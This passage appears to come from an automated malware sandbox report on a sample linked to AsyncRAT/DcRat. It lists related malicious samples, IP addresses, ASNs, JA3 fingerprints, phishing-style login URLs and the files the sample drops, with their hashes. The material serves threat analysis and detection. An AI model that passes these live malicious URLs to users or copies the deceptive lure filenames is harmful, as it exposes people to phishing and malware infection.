Jt6yqKEPdMZKK%2FsbdMW2QYCGWTu0y0eI792%2BqESxmSj4qA6XfdvJ79k%2Bt%2FyBpSzxK2dquDe2JW6MniZQO6CyU2DhiqKzuDQZmsRZ9m8oHVJf6beA8iYJEbjVJaqTWlmrxGQuQ3DSFeBBE8Ne7oPiiZpLqvFbXKPRcgHr9vMQnTDuCWeZqxXfyiW6CcQ3voM95JJ3tzh5utgMLxXBGHBXFS4Ixa%2B5xkoKj0z7EcOCMx8YiIPVZV4lNs46zB9oqP6jlu0MJAe0pYCGsL8uwTsCVWoXahV%2Fu8JKPadX1ikQgHDyF9%2BcBGvs%2FbzL7vuCdqOfmzHcvExkDQgErBb%2BBtNCNp%2B%2FWqR%2F0cmKe6xi8aBCM7qXGm9cEPpsSqr%2BUuXrF193vXut6QHyCd5IqK1XfStY9gWk7QIiMjNxV8zcI%2FXxHJzeFzAjtmoqhbv4cIOJbt8Na7zCDyqKk48L1UnuTJqozjuhQ8WSTcNUOw%2B88xJFzzj95RXpBCr2YLtw6JWH8LGB9MnYKzgGed%2B%2F2vh7SMj%2FO%2FGwwIYOzl3ObdsRSKRFiuUKJqDDT93kK1kj4kEZap5RR9jN6EErfJGTODOigOlaeC1li6Vkvd4gGLQ%2B0HboZ1yg1huBq3K6KvalppsbOoowIz7KG9DqWOJX8hCeGv9dgx9in43hGAWlPGAeuTIqH1boNtj9V3sYVooX5WKblP6tqk3kwvWKmKQOG8vtPGqF5k5Fu4FYO7VSCSzcZoMsDuO2NgJXtvtrFv2D%2FUL%2FeQWWBRqTbSAlLtN%2FMaxEHYMn8Gh%2FJUJ0BoFknnzE9rvJSVjZPOF9mWaZ5JUpoLmRcFBiOVduKCDx5GiDppZF7oI32XfhBbpQYJKIoXaSuCLE%2BUlgzBN8eV4RUkpSDfiZWEL0ePYtSC9bG1YPOZQrRvsZSXYnczNPInescpPN59yK9vXTcATqofw2juvQf	Get hash	malicious	Unknown	Browse	104.237.62.213
	https://qki.tfa.mybluehost.me/T/home/net/login.php	Get hash	malicious	Unknown	Browse	173.231.16.77
	https://dlr.xng.mybluehost.me/Tsho/net/login.php	Get hash	malicious	Unknown	Browse	64.185.227.155
	http://pavescapes.com.au//u0000	Get hash	malicious	Unknown	Browse	104.237.62.213
	https://yxl.oha.mybluehost.me/DO/net/login.php	Get hash	malicious	Unknown	Browse	173.231.16.77
	https://yxv.ens.mybluehost.me/Ca/net/login.php	Get hash	malicious	Unknown	Browse	104.237.62.213
	5NlNJIHhTf.exe	Get hash	malicious	Unknown	Browse	173.231.16.77
	Google Digital Marketing .xlsx.exe	Get hash	malicious	Unknown	Browse	64.185.227.155
	Google Digital Marketing .xlsx.exe	Get hash	malicious	Unknown	Browse	173.231.16.77
	http://rescoplastics.com	Get hash	malicious	Unknown	Browse	104.237.62.213
ip-api.com	PO_23052024.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	MOLEX 436500304-10000.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rPurchaseOrderPO05232024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	208.95.112.1
	INVOICE.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	C30XdMP03R.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NTgo4SxmS3.exe	Get hash	malicious	Blank Grabber, DCRat	Browse	208.95.112.1
	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	documentos.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
api.mylnikov.org	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.44.66
	vp2Gd0kDCt.exe	Get hash	malicious	AsyncRAT, EICAR, RedLine, StormKitty, VenomRAT	Browse	104.21.44.66
	vp2Gd0kDCt.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	172.67.196.114
	a.cmd	Get hash	malicious	Unknown	Browse	104.21.44.66
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	HTZ4az17lj.exe	Get hash	malicious	StormKitty	Browse	104.21.44.66
	GxrG78Getq.exe	Get hash	malicious	AsyncRAT, Blackshades, Quasar, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	Lex-DKM988293.zip	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.44.66
	Tax_docs_2023.pdf.lnk	Get hash	malicious	Metasploit	Browse	172.67.196.114
	ZoominstallerFull.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	104.21.44.66
api.telegram.org	RFQ-101432620247fl#U00e2#U00aexslx.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	QUOTATION SHEET_RFQ 564077 2024.5.17.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	MSK203.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	149.154.167.220
	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse	149.154.167.220
	Pg5dhIO92K.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Shipping Reference_AWB 703280542_INVOICE_PDF.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	4289397_SEA SHIPMENT.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PAYMENT COPY 02521.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	149.154.167.220
	ERsg2wzaD4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	http://enter-mantagalaxies.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	RFQ-101432620247fl#U00e2#U00aexslx.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	QUOTATION SHEET_RFQ 564077 2024.5.17.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	MSK203.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	149.154.167.220
	https://scandal-lucah-melayu-viral.group-telegram.my.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://danakaget.uniclodw.web.id/	Get hash	malicious	Unknown	Browse	149.154.164.13
	https://teiegeram-hk.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse	149.154.167.220
	https://rentry.co/webitokt/raw	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	PI No 20000814C.exe	Get hash	malicious	FormBook	Browse	104.21.28.203
	PO_23052024.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	hesaphareketi-015232024.SCR.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ORDEM DE COMPRA.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://chocolatefashiononline.com	Get hash	malicious	Unknown	Browse	104.19.178.52
	rPurchaseOrderPO05232024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://lnk.sk/mzoy	Get hash	malicious	Unknown	Browse	172.67.176.2
	https://lnk.sk/twr3	Get hash	malicious	Unknown	Browse	104.21.48.17
	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.5.109
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.16.185.241
CLOUDFLARENETUS	PI No 20000814C.exe	Get hash	malicious	FormBook	Browse	104.21.28.203
	PO_23052024.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	hesaphareketi-015232024.SCR.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ORDEM DE COMPRA.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://chocolatefashiononline.com	Get hash	malicious	Unknown	Browse	104.19.178.52
	rPurchaseOrderPO05232024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://lnk.sk/mzoy	Get hash	malicious	Unknown	Browse	172.67.176.2
	https://lnk.sk/twr3	Get hash	malicious	Unknown	Browse	104.21.48.17
	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.5.109
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.16.185.241
TUT-ASUS	PO_23052024.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	MOLEX 436500304-10000.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rPurchaseOrderPO05232024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	208.95.112.1
	INVOICE.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	C30XdMP03R.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NTgo4SxmS3.exe	Get hash	malicious	Blank Grabber, DCRat	Browse	208.95.112.1
	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	documentos.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	ORDEM DE COMPRA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.44.66
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.44.66
	f9oE743c23.exe	Get hash	malicious	LimeRAT	Browse	104.21.44.66
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.44.66
	DEsFjZJcR0.exe	Get hash	malicious	AsyncRAT	Browse	104.21.44.66
	SHIPPING DOCUMENT.PDF.exe	Get hash	malicious	Unknown	Browse	104.21.44.66
	bMAplZixhH.exe	Get hash	malicious	Njrat	Browse	104.21.44.66
	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.44.66
	z25BNjJ88767909876500h.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.44.66
	LsvjDwAj7O.exe	Get hash	malicious	AsyncRAT	Browse	104.21.44.66
3b5074b1b5d032e5620f69f9f700ff0e	PO_23052024.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 64.185.227.155
	hesaphareketi-015232024.SCR.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 64.185.227.155
	ORDEM DE COMPRA.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220 64.185.227.155
	rPurchaseOrderPO05232024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220 64.185.227.155
	ASCD0001 INQ9829......pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 64.185.227.155
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220 64.185.227.155
	msimg32.dll	Get hash	malicious	Remcos	Browse	149.154.167.220 64.185.227.155
	https://url10.mailanyone.net/scanner?m=1s9Mri-0007hx-3T&d=4%7Cmail%2F90%2F1716287400%2F1s9Mri-0007hx-3T%7Cin10g%7C57e1b682%7C12862802%7C10019077%7C664C7952D245399BD4B163183C53C253&o=%2Fphte%3A%2Fdtsseedrontec.iuconsctomat%2Fku.&s=X3gWuPbJRU1Tmui7Qt2w30qEumE	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 64.185.227.155
	INVOICE.js	Get hash	malicious	AgentTesla	Browse	149.154.167.220 64.185.227.155
	Zam#U00f3w nr 90016288247_ ZNG_1406_MG_2024_004782922.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 64.185.227.155

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\Loaader.exe	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
C:\Users\user\AppData\Local\Temp\Infected.exe	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_d0dade14ed85bb72d26ae77e109bbc7dc756ccbd_49c2e667_518c2b53-7995-485b-ba50-7e6c2e78dcc7\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.4814386234924373
Encrypted:	false
SSDEEP:	192:tI3qMhyKc0dZlfaK5eVlR1SeHcORdzuiFwZ24lO8xx:u1hyKdZlfaCUjdcOLzuiFwY4lO8xx
MD5:	B83D2005E5D0D65B0EC8B008D2F1EE68
SHA1:	9CEAE73835E735B80E4D27B18E94113A30600CCC
SHA-256:	04974C6CC9F312A5C14B4C04FC2363BD39BBCF3928E2E57C3AB0C39C7FFD5732
SHA-512:	B8CBEE851BD5DC191AEA6C7B6E84D6271C9212EBBD91B8B12004B3FE502DF8D1BCE57150456B49F92601FE751F9B5FCCAE7B327CF5CE12E2508C251E9EE320C2
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.9.4.4.8.5.2.4.8.4.6.7.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.4.4.8.5.4.7.4.3.1.8.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.1.8.c.2.b.5.3.-.7.9.9.5.-.4.8.5.b.-.b.a.5.0.-.7.e.6.c.2.e.7.8.d.c.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.7.7.d.8.4.b.d.-.b.3.d.c.-.4.9.7.5.-.b.9.e.c.-.5.7.c.6.f.4.e.c.9.8.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.l.i.e.n.t.A.n.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.8.-.0.0.0.1.-.0.0.1.4.-.8.a.1.8.-.1.1.d.e.1.5.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.7.5.5.4.6.c.8.6.2.e.2.a.4.d.9.2.f.3.e.0.e.0.f.1.3.3.7.0.e.4.0.0.0.0.0.0.0.0.0.!.0.0.0.0.2.0.a.2.5.f.0.d.a.6.8.c.3.0.9.d.0.6.2.c.4.6.2.8.e.a.d.8.b.6.f.3.7.7.a.c.7.9.6.9.!.L.o.a.d.e.r...e.x.e.....T.a.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3812.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu May 23 13:34:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	985960
Entropy (8bit):	3.065303914846116
Encrypted:	false
SSDEEP:	6144:ue5YLN2S8YME4322XnPZvDpturuVjxp29ANfp4CJmzqrqk3Q:ue5+LjK7XPtruruJyKh6zqrQ
MD5:	C349D755EEF51B59F2DE1A968B9B39F9
SHA1:	83F1460973F9517281B53C7DF669328B6F4A8B77
SHA-256:	A87AC344707503EA3ED0DAAF0556434F50DB4A445E31143A38CB4A7AC9D7C954
SHA-512:	0516E973A3D6FB01082FC26FEBA5391F63AC00C05E1C92261CADE82BB541695BA456491D155698151ABB95CA986BA438DE539433535805B7CC7D8F5A48BE2054
Malicious:	false
Preview:	MDMP..a..... ........EOf............t.......................<...l;.......?...;......................l.......8...........T...........(y..@............z...........\|..............................................................................eJ......@}......Lw......................T............EOf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CA7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6788
Entropy (8bit):	3.719371758681179
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb5mPBg6YZGg5b7x9c5aM4Ua89blADO3fJXm:R6l7wVeJIPJYZBkpra89blAsfJXm
MD5:	073BAFDC891A18B995E4E6938FDB0DAC
SHA1:	603DE664F44FC0FEF00467011A0E67C87F2B73B4
SHA-256:	8F361F1F40D737C19DAC19F8503EDA5AAE0D9AC7368E9D039D7A338F064421CA
SHA-512:	A4616B92534B244B81EF2D551B9245AFA1AF48C6AB2E3F705C54036167ADAB713A0C3D6D0503A6AEB052620D5E3435E223BB9506A7348556EE8D664BE6A3CDF8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D25.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4782
Entropy (8bit):	4.448188308191706
Encrypted:	false
SSDEEP:	48:cvIwWl8zsvJg771I9TGCQWpW8VYvYm8M4JbEIRFm4Wqyq8vkEIaSZm5od:uIjfRI7a/p7VXJQInWpIaSU5od
MD5:	0DE5300FA60CDB79DACEA77DDC0EECA0
SHA1:	18E1AADD53E5BDA10C80D1ED65A13F1CF576DE9F
SHA-256:	6BE6A3300B1364C34D4143A0C8F787BA29764144502D58D6DA34FF568A264963
SHA-512:	DF1AAB0CF87D432E09591047FD7E1EA65828E5BB5852F23B55217B8093FF44D83D7D0F89EE5EAFBC7E922AA9042A7AFE8201D499BDE3E84C11ABB3A36F00663B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="335796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\Public\SSSS.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinDefend.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	3944
Entropy (8bit):	4.144366604853265
Encrypted:	false
SSDEEP:	96:/lHPvWqeZ1qxBR7Bw5C+O6RcQFfN6NC91Q2f4u/caFoIGW1G:/lXOvqxjVtIfNP9ac4scahGWg
MD5:	AF15C512F6C637AFAAAFD4C6CB65BF78
SHA1:	61F88696ABBDA70CC224DEDE013FAA2859EC1877
SHA-256:	F6B9CC9900FFD660116070D18069D35DA925FA032B9B8DE8B883199B38E40374
SHA-512:	4DAFE5076F02146B530CE8D45B29F357F81DAD50B82462183A2FD28F1A05185DCEBD3055FED28E717AF7D1F173EA9BF5E5CEEEE177B372C37B5F045D81BFE3D8
Malicious:	false
Preview:	913064adaaa4c4fa2a9d011b66b33183..4dbc9f9e6f5a08d299bac9e54df07694..fb9c46ea81ad3e456d90d58697c12c06..b515f7b33b9f8cb1cf59dc54253cd98a..c374d40f2ddaec1be6e7ef4a5442140b..bf586f79932ffa13c6c064325134a550..4ad1610294fc90333cf4b05d06c08137..77147a3bdfc91a4e124233763d66baa1..1a29b1f3d6df9f1e47c8a77dde142238..7202f80ebfe978200eb10692ebc7e70e..8803665a6328d23cc1014a7b0e9be295..b21cba958fe872f608e4136836b25577..25a1ab487e8a0ba2d3d3469271343f4c..0599dfd9107c7647f27e69331b0a7d75..7252fd355ec6937c628c0305a4285b1d..a509f4c19577f7c66041bbf2088f9070..b12949c586feca62dda53b0508703efd..92a4285ebe0b2f8a6858b5936679d5d7..9f7165e53ce1f7f109be240a7145d96d..0c004ed394f671893ae97eb412c9876a..9f73773f1c37d213af579c529d61b2cd..7f52b05a141a277b58ea837f32b12cfd..6c30a25568bdad6b2f523a6b71ddadae..a442a54830a57de1d9c9ed8f39a59503..85cd049264557366bfd65ae85baab695..91cb6c7eadedc66ae3ef6fb3b41bd261..49756887e0538ae0d3149a1330a4ba1e..2208a92644dcb1f39eb0eb2a6cd5627e..c3639037ee8b37cf2baffd8048a417ee..8a2bd12a0dcba3

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	69993
Entropy (8bit):	7.99584879649948
Encrypted:	true
SSDEEP:	1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
MD5:	29F65BA8E88C063813CC50A4EA544E93
SHA1:	05A7040D5C127E68C25D81CC51271FFB8BEF3568
SHA-256:	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
SHA-512:	E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
Malicious:	false
Preview:	MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[I.hOB."..rK.RQ..}f..f...}....9.\|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..\|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..\|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	2.9611292441338923
Encrypted:	false
SSDEEP:	6:kKxllbN+SkQlPlEGYRMY9z+4KlDA3RUe/:5llUkPlE99SNxAhUe/
MD5:	617CD449F2E0753BA2E6875DB94368D1
SHA1:	0BD488FE7995DBFADAB37A312963F5A3D222D06B
SHA-256:	3C0B6164AA929BAF4A3A4DAA2CBC007687834E42C61DE270AC40E94156844F39
SHA-512:	0413171433DA56ED500E0FDAB2C29B596FE117AECF3CD2DEE5A0DF3932F8B06D53BAAEEAE45B8D238017CFE2B0F80C9CAED23B17F51CFEBE17C73E445002EF0B
Malicious:	false
Preview:	p...... .........>......(....................................................... ........M.....................i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\Client.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Infected.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\Infected.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
